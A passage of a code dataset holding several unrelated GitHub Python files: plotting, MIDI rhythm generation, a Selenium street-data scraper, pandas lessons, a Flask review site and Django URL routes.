ax41.set_title('Form factor', fontsize = 25)\r\nax41.set_xlabel(r'$t/T$', fontsize = 25, labelpad = 10)\r\nax41.set_ylabel(r'$\\mathcal{F}$', fontsize = 25, labelpad = 10)\r\nax41.tick_params(axis='both', which='major', labelsize=20, width = 2, length=4)\r\nplt.legend(fontsize=20)\r\n\r\n\r\n# ---- Fig 5 ----- \r\nfig5 = plt.figure(5, figsize = [12, 8])\r\nax5 = fig5.add_subplot(1,1,1)\r\nax5.plot(t_best/timescale_best, concurrence_best, lw = 3, label='optimal', color='black')\r\nax5.plot(t_worst/timescale_worst, concurrence_worst, lw = 3, label='suboptimal', ls='--', color='grey')\r\nax5.set_xlabel(r'$t/T$', fontsize = 20, labelpad = 10)\r\nax5.set_ylabel(r'$C$', fontsize = 20, labelpad = 10)\r\nax5.tick_params(axis='both', which='major', labelsize=15, width = 2, length=4)\r\nax5.legend(fontsize=20)","repo_name":"carlos-hernani/QuantumMemristor","sub_path":"quantum_correlations_and_figures.py","file_name":"quantum_correlations_and_figures.py","file_ext":"py","file_size_in_byte":6610,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"15327957778","text":"from numpy import random\nfrom music21 import midi\n\nmt = midi.MidiTrack(1)\n\ndef populate_midi_track_from_data(mt, data):\n t = 0\n tLast = 0\n for d, p, v in data:\n dt = midi.DeltaTime(mt)\n dt.time = t - tLast\n 
# add to track events\n mt.events.append(dt)\n\n me = midi.MidiEvent(mt)\n me.type = \"NOTE_ON\"\n me.channel = 1\n me.time = None # d\n me.pitch = p\n me.velocity = v\n mt.events.append(me)\n\n # add note off / velocity zero message\n dt = midi.DeltaTime(mt)\n dt.time = d\n # add to track events\n mt.events.append(dt)\n\n me = midi.MidiEvent(mt)\n me.type = \"NOTE_ON\"\n me.channel = 1\n me.time = None # d\n me.pitch = p\n me.velocity = 0\n mt.events.append(me)\n\n tLast = t + d # have delta to note off\n t += d # next time\n\n # add end of track\n dt = midi.DeltaTime(mt)\n dt.time = 0\n mt.events.append(dt)\n\n me = midi.MidiEvent(mt)\n me.type = \"END_OF_TRACK\"\n me.channel = 1\n me.data = '' # must set data to empty string\n mt.events.append(me)\n\n return mt\n\n# duration, pitch, velocity\ndata = [[256, 36, 100]] # one start note\ntotal_duration = 0\n\nbeats_per_measure = 16\nmeasures = 64\nnum_beats = measures * beats_per_measure\nbeat_idx = 1\n\n# note array is ordered [duration, pitch, velocity]\nfor i in range(1, num_beats):\n\n # generate one beat\n note = [256, 0, 0]\n\n e = random.random()\n last_note_was_rest = data[-1][2] < 0\n if e < 0.15 and beat_idx > 0: # no resting on down beat\n # rest\n note[0] = 256\n note[1] = 0\n note[2] = 0\n data.append(note)\n elif last_note_was_rest and e < 0.25 and beat_idx > 0:\n # sustain rest\n data[-1][0] += 256\n elif not last_note_was_rest and e < 0.50 and beat_idx > 0:\n # sustain note\n data[-1][0] += 256\n else:\n # new note\n if beat_idx % 4 == 0:\n pitch = 36\n else:\n pitch = random.randint(36, 52)\n note[0] = 256 # 256 is 16th note\n note[1] = pitch\n note[2] = random.randint(40, 100)\n last_real_pitch = note[1]\n data.append(note)\n\n # change chords\n beat_idx += 1\n if beat_idx == beats_per_measure/4:\n beat_idx = 0\n print(i, ' out of ', num_beats)\n\nprint(data)\npopulate_midi_track_from_data(mt, data)\n\nmf = midi.MidiFile()\nmf.ticksPerQuarterNote = 1024 # magic number?\nmf.tracks.append(mt)\n\nmf.open('comp1 Project/rhythm.mid', 'wb')\nmf.write()\nmf.close()\n","repo_name":"PeterMitrano/Music","sub_path":"generate_rhythm.py","file_name":"generate_rhythm.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37442184216","text":"import json\n\nclass JSONOps():\n '''\n RESTful filehandling Operations\n '''\n def __init__(self,path):\n ''' check if the file exists else create an empty json '''\n self.path = path\n try:\n with open(self.path,\"r\") as rf:\n pass\n except:\n with open(self.path,\"w+\") as wf:\n wf.write(\"{ }\")\n\n def get_from_json(self):\n with open(self.path,\"r\") as jsonfile:\n return jsonfile.read()\n\n def update_json_file(self,data):\n with open(self.path,\"w\") as jsonfile:\n print(json.dumps(data,indent=4))\n jsonfile.write(json.dumps(data))\n\n def append_json_file(self,data):\n json_dict = json.loads(self.get_from_json())\n json_dict.update(data)\n self.update_json_file(json_dict)","repo_name":"sribs/CamelApp","sub_path":"JSONOps.py","file_name":"JSONOps.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3971407242","text":"total = 0\nopcion= 0\n\nwhile opcion != 6:\n print(\"====== Panadería DuocUC ======\")\n print(\"1.- Pan Amasado\")\n print(\"2.- Pan Molde\")\n print(\"3.- Pan Baguette\")\n print(\"4.- Pan Integral\")\n print(\"5.- Total de compra\")\n print(\"6.- Salir\")\n try:\n opcion = 
int(input(\"Ingrese una opción:\"))\n except:\n print(\"Error en al opción ingresada\")\n\n if opcion < 1 or opcion > 6:\n print(\"Opción no válida\")\n input(\"Presione enter para continuar\")\n elif opcion == 6:\n print(\"Aplicación cerrada\")\n elif opcion == 5:\n if total < 5000:\n total *= 1.1\n else:\n print(\"Envio gratis\")\n print(\"El total de la compra es:\",int(total))\n total = 0\n input(\"Presione enter para continuar\")\n\n else:\n try:\n cantidad = int(input(\"Ingrese cantidad:\"))\n except:\n print(\"Error en la cantidad ingresada\")\n continue\n \n if opcion == 1:\n total += cantidad * 1500\n elif opcion == 2:\n total += cantidad * 1000\n elif opcion == 3:\n total += cantidad * 2000\n elif opcion == 4:\n total += cantidad * 3000\n ","repo_name":"patricioyanez/PGY1121_002","sub_path":"EA3/EjemploWhile4.py","file_name":"EjemploWhile4.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23175505661","text":"#!/usr/bin/env python\n\nimport json\nfrom auth0_client.Auth0Client import Auth0Client\nfrom auth0_client.menu.menu_helper.common import *\nfrom auth0_client.menu.menu_helper.pretty import *\n\n\ntry:\n\n client = Auth0Client(auth_config())\n results = client.get_all_rules()\n\n if type(results) == type(str()):\n results = json.loads(results)\n\n if results:\n print(pretty(results))\n else:\n print('No rules')\n\n\n\nexcept (KeyboardInterrupt, SystemExit):\n sys.exit()","repo_name":"rubelw/auth0_client","sub_path":"auth0_client/menu/datafiles/scripts/list_rules.py","file_name":"list_rules.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23573778991","text":"import sys\n\n\n\ndef split_sequence(n):\n if n%2:\n return (n-1)/2, (n-1)/2\n return n/2-1, n/2\n\n\nif __name__ == \"__main__\":\n filename = sys.argv[1]\n infile = open(filename+\".in\", \"r\")\n outfile = open(filename+\".out\", \"w\")\n T = int(infile.readline())\n for case in range(T):\n N, K = [int(char) for char in infile.readline().split()]\n remaining_people = K\n coming_people = 1\n while remaining_people - coming_people >= 0:\n remaining_people -= coming_people\n coming_people *= 2\n length = float(N-K)/float(coming_people//2)\n if remaining_people > 0:\n length /= 2.0\n min_free = int(length/2)\n max_free = int(length-min_free)\n #print max_free, min_free\n outfile.write(\"Case #{}: {} {}\\n\".format(case+1, max_free, min_free))\n infile.close()\n outfile.close()\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/905.py","file_name":"905.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70347971394","text":"import re\nimport yaml\nimport sqlite3\nimport re\nimport os\nimport subprocess\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0\nfrom selenium.webdriver.support import expected_conditions as EC # available since 2.26.0\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import WebDriverException, StaleElementReferenceException\nfrom contextlib import contextmanager\n\nfrom pyvirtualdisplay import Display as PYDisplay\nfrom os import popen, 
mkdir\nfrom time import sleep\nfrom typing import Optional,Any\nfrom textwrap import dedent\n\n\nfrom Config_Msk import DBVER,DBNAME\nfrom Util import selenium_display,selenium_driver,class_has\n\nSCRIPT='''\n\nfunction clearclass(item, cls) {\n item.classList.remove(cls);\n}\nfunction setclass(item, cls) {\n item.classList.add(cls);\n}\n\nfunction filter(predicate) {\n var nodelist = document.getElementById('data').getElementsByTagName('tr');\n var good = new Array()\n var bad = new Array()\n for (var i = 1; i < nodelist.length; i++) {\n var tr = nodelist.item(i);\n if (i % 100 == 0) {\n console.log('Processed '+i+' of '+nodelist.length)\n }\n if(predicate(tr)) {\n good.push(tr);\n }\n else {\n bad.push(tr);\n }\n }\n console.log('Collect '+good.length+' / '+bad.length)\n\n bad.forEach(function(el,index){\n el.style.display = \"none\";\n });\n good.forEach(function(el,index){\n el.style.display = \"table-row\";\n });\n\n console.log('Complete '+good.length+' / '+bad.length)\n}\n\nfunction matchtr(tr, record) {\n var tds = tr.getElementsByTagName('td');\n for(var j = 0 ; j \n if (tds[j].innerHTML.trim() == record) {\n return true;\n }\n }\n return false\n}\n\nfunction trtext(tr) {\n var res = \" \";\n var tds = tr.getElementsByTagName('td');\n for(var j = 0 ; j 0)\n return true;\n else\n return false;\n };\n}\n'''\n\ndef format_html(dbname:str=DBNAME):\n with sqlite3.connect(dbname) as con:\n sql='''\n SELECT Name,District,Houses,Link\n FROM Streets_GInfo\n ORDER BY District,Name'''\n\n with open(\"Streets_GInfo_Msk.html\",\"w\") as f:\n f.write(dedent('''\\\n \n \n \n \n \n
\n Search treats the table rows as long sentences in which the column\n texts are joined by the symbols ' ; ' (with spaces). The search understands\n regular expressions. Case does not matter.\n \n \n Examples:\n \n • 'Верхний' - filter rows that contain the string Верхний\n • 'Верхний.* 4Б' - filter rows that contain the word\n Верхний, then any number of any characters, then a space, then 4Б\n • 'Профсоюзная|Вишнёвая' - filter rows that contain\n the word Профсоюзная or the word Вишнёвая\n • 'Вишнёвая.* 3|Профсоюзная' - filter rows that contain\n the word Профсоюзная or the word Вишнёвая-something-something-space-3\n \n \n \n \n
\n \n \n \n \n \n \n \n '''))\n for i,r in enumerate(con.execute(sql)):\n name = str(r[0])\n district = str(r[1])\n houses = str(r[2])\n link = str(r[3])\n\n f.write(dedent(f'''\n \n \n \n \n \n \n '''))\n f.write(dedent('''\n
РайонНазваниеДома
{i}{district}{name}{houses}
\n \n \n '''))\n\ndef mkdb(dbname:str=DBNAME):\n with sqlite3.connect(dbname) as con:\n try:\n cur = con.cursor()\n cur.execute(\" \\\n CREATE TABLE Streets_GInfo( \\\n Name TEXT PRIMARY KEY, \\\n Link TEXT NOT NULL, \\\n District TEXT, \\\n Houses TEXT, \\\n Version INT NOT NULL, \\\n Screenshot TEXT)\")\n con.commit()\n except sqlite3.OperationalError as err:\n print(err,'(Ignoring)')\n\n\n# def addstreet(con, name:str, link:str):\n# with con:\n# try:\n# print(f'Adding street \"{name}\" ({link})')\n# con.execute('INSERT INTO Streets(Name, Link, Version) VALUES(?, ?, ?)',\n# (name, link, DBVER))\n# except sqlite3.Error as err:\n# print(\"Sqlite error\", str(err))\n\n\ndef format_md(dbname:str=DBNAME):\n with sqlite3.connect(dbname) as con:\n sql=f'''\n SELECT Name,District,Houses,Link\n FROM Streets_GInfo\n ORDER BY District,Name'''\n\n with open(\"Streets_GInfo_Msk.md\",\"w\") as f:\n f.write(f\"|№|Район|Название|Дома|\\n\")\n f.write(f\"|-|-|-|-|\\n\")\n for i,r in enumerate(con.execute(sql)):\n name = str(r[0])\n district = str(r[1])\n houses = str(r[2])\n link = str(r[3])\n\n f.write(f\"|{i}|{district}|[{name}]({link})|{houses}|\\n\")\n\n\ndef scrap(close:bool=True, dbname:str=DBNAME):\n \"\"\" Open display and samples chat messages \"\"\"\n\n ret=subprocess.call(['convert','-version'])\n assert ret==0\n\n screenshotdir=os.path.dirname(os.path.abspath(__file__)) + '/../screenshots_msk/'\n if not os.path.isdir(screenshotdir):\n os.mkdir(screenshotdir)\n\n with selenium_display(visible=True,close=close) as disp, \\\n selenium_driver(close=close) as driver:\n\n url = f\"http://ginfo.ru/ulicy/\"\n print('Navigating to', url)\n driver.get(url)\n\n print('Searching for elements')\n els=driver.find_elements(By.XPATH, f\"//div[{class_has('street_unit')}]/a\")\n street_urls=[el.get_attribute('href') for el in els]\n print(f\"Found {len(street_urls)} street links\")\n\n with sqlite3.connect(dbname) as con:\n for i,url in enumerate(street_urls):\n try:\n print('Navigating to', url)\n driver.get(url)\n except Exception as err:\n print(f'Cant navigate to {url} ({err})')\n continue\n\n try:\n elname=driver.find_elements(\n By.XPATH,\n f\"//span[{class_has('this_page')}]\")[0]\n name=elname.text\n except Exception as err:\n print(f'Cant find name ({err}), skipping')\n continue\n\n try:\n eldistr=driver.find_elements(\n By.XPATH,\n f\"//div[{class_has('opis_ulica')}]/a\")[0]\n district=re.sub('районе', 'район', eldistr.text)\n district=re.sub('поселении', 'поселение', district)\n except Exception as err:\n print(f'Cant find District ({err})')\n district=None\n\n try:\n houslist=[]\n eldoms=driver.find_elements(\n By.XPATH,\n f\"//div[{class_has('dom_list')}]/div/a\")\n for el in eldoms:\n houslist.append(el.text)\n houses=', '.join(houslist)\n except Exception as err:\n print(f'Cant find houses ({err})')\n houses=None\n\n try:\n print(f\"Capturing screenshot of {name}\")\n els=driver.find_elements(\n By.XPATH,\n f\"//div[{class_has('right_block_2')}]\")\n if len(els)!=1:\n raise ValueError('Cant find screenshot block ')\n\n screenshot_file=\"/tmp/street_screenshot.png\"\n print(f\"Saving {screenshot_file}\")\n els[0].screenshot(screenshot_file)\n small_screenshot_filename=(\"small_screenshot_%04d.png\" %(i,))\n small_screenshot_file=screenshotdir+'/'+small_screenshot_filename\n\n print(f\"Converting to {small_screenshot_file}\")\n ret=subprocess.call(['convert', '-resize', '192x192', screenshot_file, small_screenshot_file])\n if ret!=0:\n raise ValueError(f\"Error code is {ret} (!=0), skipping\")\n\n 
except Exception as err:\n print(f'Cant prepare a screenshot ({err}), skipping')\n small_screenshot_filename=None\n\n\n print(f\"Adding name '{name}'\\ndistrict '{district}'\\nhouses '{houses}'\")\n try:\n con.execute('''\n INSERT INTO Streets_GInfo(Name, Link, District, Houses, Screenshot, Version)\n VALUES (?, ?, ?, ?, ?, ?)''',\n (name, url, district, houses, small_screenshot_filename, DBVER))\n except sqlite3.Error as err:\n print(\"Sqlite error\", str(err), \"(ignoring)\")\n\n\n\n\n\n\n\n\ndef scrap_screenshots(dbname:str=DBNAME):\n with selenium_display(visible=True,close=True) as disp, \\\n selenium_driver(close=True) as driver:\n\n ret=subprocess.call(['convert','-version'])\n assert ret==0\n\n screenshotdir=os.path.dirname(os.path.abspath(__file__)) + '/../screenshots/'\n if not os.path.isdir(screenshotdir):\n os.mkdir(screenshotdir)\n\n with sqlite3.connect(dbname) as con:\n sql=\"SELECT Name,Link FROM Streets_GInfo WHERE Link is NOT NULL ORDER BY Name\"\n for i,r in enumerate(con.execute(sql)):\n name = str(r[0])\n url = str(r[1])\n\n try:\n print('Navigating to', url)\n driver.get(url)\n except Exception as err:\n print(f'Cant navigate to {url} ({err})')\n continue\n\n try:\n print(f\"Capturing {name}\")\n els=driver.find_elements(\n By.XPATH,\n f\"//div[{class_has('right_block_2')}]\")\n if len(els)<1:\n continue\n\n screenshot_file=\"/tmp/street_screenshot.png\"\n print(f\"Saving {screenshot_file}\")\n els[0].screenshot(screenshot_file)\n small_screenshot_filename=(\"small_screenshot_%04d.png\" %(i,))\n small_screenshot_file=screenshotdir+'/'+small_screenshot_filename\n\n print(f\"Converting to {small_screenshot_file}\")\n ret=subprocess.call(['convert', '-resize', '192x192', screenshot_file, small_screenshot_file])\n if ret!=0:\n print(f\"Error code is {ret} (!=0), skipping\")\n continue\n\n except Exception as err:\n print(f'Cant prepare a screenshot ({err}), skipping')\n continue\n\n try:\n print(f\"Updating name '{name}'\\nscreenshot '{small_screenshot_filename}'\\n\")\n con.execute('''\n UPDATE Streets_GInfo SET Screenshot = ? 
WHERE Name = ?''',\n (small_screenshot_filename, name))\n except sqlite3.Error as err:\n print(\"Sqlite error\", str(err), \"(ignoring)\")\n\n\n\nif __name__ == '__main__':\n scrap()\n\n","repo_name":"grwlf/streets","sub_path":"src/GInfo_Msk.py","file_name":"GInfo_Msk.py","file_ext":"py","file_size_in_byte":12197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31063814935","text":"from flask import render_template, request, redirect\nfrom app import app\nimport users\nimport stats\nimport places\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\", places=stats.places_for_map())\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n if request.method == \"GET\":\n return render_template(\"login.html\")\n\n if request.method == \"POST\":\n username = request.form[\"username\"]\n password = request.form[\"password\"]\n if not users.login(username, password):\n return render_template(\"error.html\", message=\"Väärä tunnus tai salasana\")\n return redirect(\"/\")\n\n@app.route(\"/logout\")\ndef logout():\n users.logout()\n return redirect(\"/\")\n\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n if request.method == \"GET\":\n return render_template(\"register.html\")\n\n if request.method == \"POST\":\n username = request.form[\"username\"]\n if len(username) < 1 or len(username) > 20:\n return render_template(\"error.html\", message=\"Tunnuksen tulee olla 1-20 merkkiä pitkä\")\n\n password1 = request.form[\"password1\"]\n password2 = request.form[\"password2\"]\n if password1 != password2:\n return render_template(\"error.html\", message=\"Salasanat eroavat toisistaan\")\n if password1 == \"\":\n return render_template(\"error.html\", message=\"Salasana on tyhjä\")\n\n role = request.form[\"role\"]\n if role not in (\"1\", \"2\"):\n return render_template(\"error.html\", message=\"Tuntematon käyttäjärooli\")\n\n if not users.register(username, password1, role):\n return render_template(\"error.html\", message=\"Rekisteröinti ei onnistunut\")\n\n return redirect(\"/\")\n\n@app.route(\"/search\", methods=[\"POST\"])\ndef search():\n query = request.form[\"query\"]\n if len(query) < 1 or len(query) > 20:\n return render_template(\"error.html\", message=\"Hakusanan tulee olla 1-20 merkkiä pitkä\")\n\n result = stats.find_all_by_word(query)\n if not result:\n return render_template(\"error.html\", message=\"Hakusanalla ei löytynyt tuloksia\")\n\n return render_template(\"search.html\", places=result)\n\n@app.route(\"/info/\")\ndef info(place_id):\n information = places.get_place_info(place_id)\n groups = places.get_groups(place_id)\n return render_template(\"info.html\", name=information[1], groups=groups,\n address=information[2], hours=information[4:],\n description=information[3], id=information[0])\n\n@app.route(\"/post_review/\", methods=[\"GET\", \"POST\"])\ndef post_review(place_id):\n if request.method == \"GET\":\n users.require_role(1)\n return render_template(\"post_review.html\", id=place_id)\n if request.method == \"POST\":\n users.require_role(1)\n users.check_csrf()\n\n stars = int(request.form[\"stars\"])\n if stars < 1 or stars > 5:\n return render_template(\"error.html\", message=\"Virheellinen tähtimäärä\")\n\n comment = request.form[\"comment\"]\n if len(comment) > 1000:\n return render_template(\"error.html\", message=\"Liian pitkä kommentti\")\n if comment == \"\":\n comment = \"-\"\n places.add_review(place_id, users.user_id(), stars, comment)\n 
return redirect(\"/reviews/\"+str(place_id))\n\n@app.route(\"/reviews/\")\ndef reviews(place_id):\n results = places.get_reviews(place_id)\n return render_template(\"reviews.html\", reviews=results, id=place_id)\n\n@app.route(\"/list\")\ndef place_list():\n ranking = stats.place_rankings()\n return render_template(\"list.html\", rankings=ranking)\n\n@app.route(\"/add_place\", methods=[\"GET\", \"POST\"])\ndef add_place():\n if request.method == \"GET\":\n users.require_role(2)\n return render_template(\"add_place.html\")\n\n if request.method == \"POST\":\n users.require_role(2)\n users.check_csrf()\n\n name = request.form[\"name\"]\n if len(name) < 1 or len(name) > 40:\n return render_template(\"error.html\", message=\"Nimen tulee olla 1-40 merkkiä pitkä\")\n address = request.form[\"address\"]\n if len(address) < 1 or len(address) > 40:\n return render_template(\"error.html\", message=\"Osoite tulee olla 1-40 merkkiä pitkä\")\n lat = request.form[\"lat\"]\n lng = request.form[\"lng\"]\n if len(lat) < 1 or len(lng) < 1 or len(lat) > 40 or len(lng) > 40:\n return render_template(\"error.html\", message=\"Väärän mittaiset koordinaatit\")\n description = request.form[\"description\"]\n if len(description) > 1000:\n return render_template(\"error.html\", message=\"Kuvaus on liian pitkä\")\n\n for day in [\"mon\", \"tue\", \"wed\", \"thu\", \"fri\", \"sat\", \"sun\"]:\n if len(request.form[\"open_\"+day]) > 5 or len(request.form[\"close_\"+day]) > 5:\n return render_template(\"error.html\", message=\"Vääränmittainen aukioloaika\")\n\n monday_hours = request.form[\"open_mon\"] + \"-\" + request.form[\"close_mon\"]\n tuesday_hours = request.form[\"open_tue\"] + \"-\" + request.form[\"close_tue\"]\n wednesday_hours = request.form[\"open_wed\"] + \"-\" + request.form[\"close_wed\"]\n thursday_hours = request.form[\"open_thu\"] + \"-\" + request.form[\"close_thu\"]\n friday_hours = request.form[\"open_fri\"] + \"-\" + request.form[\"close_fri\"]\n saturday_hours = request.form[\"open_sat\"] + \"-\" + request.form[\"close_sat\"]\n sunday_hours = request.form[\"open_sun\"] + \"-\" + request.form[\"close_sun\"]\n\n place_id = places.add_place(name, address, lat, lng, description,\n monday_hours, tuesday_hours,\n wednesday_hours, thursday_hours, friday_hours,\n saturday_hours, sunday_hours)\n\n return redirect(\"/info/\" + str(place_id))\n\n@app.route(\"/add_group\", methods=[\"GET\", \"POST\"])\ndef add_group():\n if request.method == \"GET\":\n users.require_role(2)\n return render_template(\"add_group.html\")\n if request.method == \"POST\":\n users.require_role(2)\n users.check_csrf()\n group_name = request.form[\"groupname\"]\n if len(group_name) < 1 or len(group_name) > 20:\n return render_template(\"error.html\", message=\"Nimen pituus tulee olla 1-20 merkkiä\")\n if not places.create_groupname(group_name):\n return render_template(\"error.html\", message=\"Samanniminen ryhmä on jo olemassa\")\n return redirect(\"/\")\n\n@app.route(\"/update\", methods=[\"GET\", \"POST\"])\ndef update():\n if request.method == \"GET\":\n users.require_role(2)\n return render_template(\"update.html\", content=\"\", places=stats.place_list())\n if request.method == \"POST\":\n users.require_role(2)\n users.check_csrf()\n if \"place_id\" in request.form:\n content = places.get_place_info(request.form[\"place_id\"])\n groups = places.get_groupnames()\n return render_template(\"update.html\", content=content, groups=groups)\n\n name = request.form[\"name\"]\n if len(name) < 1 or len(name) > 40:\n return 
render_template(\"error.html\", message=\"Nimen tulee olla 1-40 merkkiä pitkä\")\n address = request.form[\"address\"]\n if len(address) < 1 or len(address) > 40:\n return render_template(\"error.html\", message=\"Osoite tulee olla 1-40 merkkiä pitkä\")\n description = request.form[\"description\"]\n if len(description) > 1000:\n return render_template(\"error.html\", message=\"Kuvaus on liian pitkä\")\n\n for day in [\"mon\", \"tue\", \"wed\", \"thu\", \"fri\", \"sat\", \"sun\"]:\n if len(request.form[\"open_\"+day]) > 5 or len(request.form[\"close_\"+day]) > 5:\n return render_template(\"error.html\", message=\"Vääränmittainen aukioloaika\")\n\n monday_hours = request.form[\"open_mon\"] + \"-\" + request.form[\"close_mon\"]\n tuesday_hours = request.form[\"open_tue\"] + \"-\" + request.form[\"close_tue\"]\n wednesday_hours = request.form[\"open_wed\"] + \"-\" + request.form[\"close_wed\"]\n thursday_hours = request.form[\"open_thu\"] + \"-\" + request.form[\"close_thu\"]\n friday_hours = request.form[\"open_fri\"] + \"-\" + request.form[\"close_fri\"]\n saturday_hours = request.form[\"open_sat\"] + \"-\" + request.form[\"close_sat\"]\n sunday_hours = request.form[\"open_sun\"] + \"-\" + request.form[\"close_sun\"]\n place_id = request.form[\"id\"]\n places.update_place(place_id, name, address, description, monday_hours,\n tuesday_hours, wednesday_hours, thursday_hours, friday_hours,\n saturday_hours, sunday_hours)\n if \"group\" in request.form:\n for group_id in request.form[\"group\"]:\n places.add_place_to_group(place_id, int(group_id))\n return redirect(\"/info/\" + str(place_id))\n\n@app.route(\"/delete_place/\", methods=[\"POST\"])\ndef delete_place(place_id):\n users.require_role(2)\n users.check_csrf()\n places.delete_place(place_id)\n return redirect(\"/\")\n\n@app.route(\"/delete_review/\", methods=[\"POST\"])\ndef delete_review(review_id):\n users.require_role(2)\n users.check_csrf()\n places.delete_review(review_id)\n place_id = request.form[\"place_id\"]\n return redirect(\"/reviews/\" + str(place_id))\n","repo_name":"nikomakir/tsoha-harjoitustyo","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":9379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29889151171","text":"'''\nauthor: Adam Forestier\ndates: March 22, 2023\nnotes:\n - apply() apply any custom python function of our own to every row in a series. these functions should return 1 value\n'''\nimport numpy as np \nimport pandas as pd\n\ndf = pd.read_csv('tips.csv')\nreset_df = df\n\n# apply() for single argument\ndef price_class(price):\n p_class = '$$'\n if price < 10:\n p_class = '$'\n elif price > 20:\n p_class = '$$$'\n return p_class\n\ndf['price_class'] = df['total_bill'].apply(price_class) # Create a new column in the dataframe using the apply class\nlast_four_cc = df['CC Number'].apply(lambda num: str(num)[-4:]) # This will create a Pandas series of the last 4 digits of credit card numbers. The column name is the argument being passed into the lambda\n\n# apply() for multiple arguments\ndef quality_tipper(total_bill, tip):\n tip_percentage = 100 * (tip / total_bill)\n tip_quality = 'stingy'\n if tip_percentage > 20:\n tip_quality = 'generous'\n return tip_quality\n\ndf['tip_quality'] = df[['total_bill', 'tip']].apply(lambda df: quality_tipper(df['total_bill'], df['tip']), axis=1) # apply method on multiple columns in a pandas dataframe\n\n# Vectorize - This is EASIER to type AND FASTER! 
Really no reason not to use this approach\ndef inflation(total_bill):\n    '''\n    I totally just made this up for an example\n    '''\n    return round(total_bill + (total_bill * .173), 2)\n\ndf['first_four_cc'] = np.vectorize(lambda x: str(x)[:4])(df['CC Number']) # Single column with lambda\ndf['Inflation Price'] = np.vectorize(inflation)(df['total_bill']) # Single column with function\ndf['tip_quality'] = np.vectorize(quality_tipper)(df['total_bill'], df['tip']) # Another way to apply a method on multiple columns. \n\n# Describing\ndf = reset_df\ndf.describe() # Statistical information\n\n# Sorting\ndf.sort_values('tip') # Ascending\ndf.sort_values('tip', ascending=False) # Descending\ndf.sort_values(['tip', 'total_bill']) # Multiple columns\n\n# Searching\ndf['tip'].max() # Largest\ndf['tip'].min() # smallest\ndf['total_bill'].idxmax() # Location of largest value\ndf['price_per_person'].idxmin() # Location of lowest value\nbiggest_tip = df.iloc[df['tip'].idxmax()] # get the largest tip by location\n\n# Correlations\ndf.corr() # Shows how correlated columns are with each other. Max value is 1\n\n# counting\ndf['sex'].value_counts() # Count male and female\ndf['day'].unique() # Show what unique values exist in column\ndf['day'].nunique() # Show number of unique values that exist in column\n\n# Replace\ndf['sex'] = df['sex'].replace('Female', 'f') # Replace single value in column\ndf['time'] = df['time'].replace(['Breakfast', 'Lunch', 'Dinner'], ['B', 'L', 'D']) # Replace multiple values in column. Replace = Better for single item\nmy_map = {'Male': 'm'}\ndf['sex'] = df['sex'].map(my_map) # Replace using mapping. Map = better for lots of items\nmy_map = {\n    '$': 'cheap',\n    '$$': 'moderate',\n    '$$$': 'expensive'\n}\ndf['price_class'] = df['price_class'].map(my_map)\n# print(df.head())\n\n# Duplicates\ndf.duplicated() # Show rows that are duplicates\ndf.drop_duplicates() # Remove duplicates\n\n# Between\ndf = reset_df\ndf['total_bill'].between(10, 20, inclusive=True) # Show boolean for if the total bill row is between 10 - 20\nspecific_df = df[df['total_bill'].between(10, 20, inclusive=True)] # create filtered dataframe with only bills between 10-20 \n\n# n largest and n smallest\nlargest_spender_df = df.nlargest(10, 'total_bill') # df with 10 largest spenders\ndf.nsmallest(5, 'tip') # show 5 smallest tips\n\n# Sampling\ndf.sample(5) # 5 random rows\ndf.sample(frac=.1) # 10% of random rows","repo_name":"atfb10/Py-DataScience-MachineLearning-Course","sub_path":"Course/Pandas/lessons/method_calls.py","file_name":"method_calls.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
{"seq_id":"34132811787","text":"from django.conf.urls import patterns, include, url\n\nurlpatterns = patterns('task.views',\n\n    url( r'^tasks$', 'show_tasks' ),\n    url( r'^dashboard$', 'show_dashboard' ),\n    url( r'^task/$', \t\t\t\t 'task' ),\n    url( r'^task/(?P<id>\\d+)$', 'task' ),\n    url( r'^show_lst_not_dev$', \t\t\t 'show_lst_not_dev' ),\n    url( r'^change_status$', 'change_status' ),\n    url( r'^get_tasks$', 'get_tasks' ),\n    url( r'^assign_for_user', 'assign_for_user' ),\n    url( r'^get_progress_bar_user$', 'get_progress_bar_user' ),\n    url( r'^statistic_users$', 'statistic_users' ),\n    url( r'^get_progress_users$', 'get_progress_users' ),\n)","repo_name":"RitaTim/task-manager","sub_path":"task/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
